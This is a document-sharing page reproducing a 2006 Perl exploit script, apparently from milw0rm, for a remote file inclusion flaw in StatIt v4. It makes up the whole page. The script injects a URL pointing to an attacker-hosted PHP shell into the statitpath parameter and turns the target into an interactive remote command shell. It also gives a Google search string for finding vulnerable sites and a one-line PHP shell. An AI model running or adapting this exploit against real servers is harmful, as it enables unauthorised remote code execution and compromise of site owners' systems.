Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out

StatIt v4 statitpath Remote File Inclusion Exploit

VIEWS: 34 PAGES: 2

									                                 StatIt v4 statitpath Remote File Inclusion Exploit                                              Page 1/2
  1    #!/usr/bin/perl
  2    ##
  3    # Statit V4 Remote File Inclusion exploit
  4    # Bug discovered By IGNOR3
  5    # IGNOR3_llvlle@yahoo.com
  6    # http://www.smart−boys.com
  7    # Google Search=inurl:statit.php
  8    # usage:
  9    # perl statit.pl <target> <cmd shell location> <cmd shell variable>
  10   # perl statit.pl http://target.com/statit/ http://www.golha.net/ignor3/shell.txt cmd
  11   # cmd shell example: <?system($cmd);?>
  12   # cmd shell variable: ($_GET[cmd]);
  13   use LWP::UserAgent;
  14   $Path = $ARGV[0];
  15   $Pathtocmd = $ARGV[1];
  16   $cmdv = $ARGV[2];
  17   if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
  18   head();
  19   while()
  20   {
  21         print "[shell] \$";
  22   while(<STDIN>)
  23         {
  24                     $cmd=$_;
  25                     chomp($cmd);
  26   $xpl = LWP::UserAgent−>new() or die;
  27   $req = HTTP::Request−>new(GET =>$Path.’visible_count_inc.php?statitpath=’.$Pathtocmd.’?&’.$cmdv.’=’.$cmd)or die "\nCould Not connect\
       n";
  28   $res = $xpl−>request($req);
  29   $return = $res−>content;
  30   $return =~ tr/[\n]/[ê]/;
  31   if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
  32   elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/
       )
  33         {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
  34   elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
  35   if($return =~ /(.*)/)
  36   {
  37         $finreturn = $1;
  38         $finreturn=~ tr/[ê]/[\n]/;
  39         print "\r\n$finreturn\n\r";
  40         last;
  41   }
  42   else {print "[shell] \$";}}}last;
  43   sub head()
  44    {
  45    print "\n============================================================================\r\n";
  46    print " Statit V4 Remote File Inclusion exploit\r\n";
  47    print "============================================================================\r\n";
  48    }
  49   sub usage()
  50    {
IGNOR3                                                                                                                            05/05/2006
                                StatIt v4 statitpath Remote File Inclusion Exploit                  Page 2/2
  51    head();
  52    print " Usage: perl statit.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
  53    print " <Site> − Full path to Fastclick ex: http://www.site.com/statit/ \r\n";
  54    print " <cmd shell> − Path to cmd Shell e.g http://www.golha.net/ignor3/shell.txt \r\n";
  55    print " <cmd variable> − Command variable used in php shell \r\n";
  56    print "============================================================================\r\n";
  57    print "                  BUG DISCOVERED BY IGNOR3 \r\n";
  58    print "                  Yahoo ID: IGNOR3_llvlle \r\n";
  59    print "                  http://www.smart−boys.com \r\n";
  60    print "============================================================================\r\n";
  61    print " Download The Video: http://www.ignor3.persiangig.com/video/statit.rar \r\n";
  62    print "============================================================================\r\n";
  63    exit();
  64    }
  65
  66   # milw0rm.com [2006−05−05]




IGNOR3                                                                                              05/05/2006

								
To top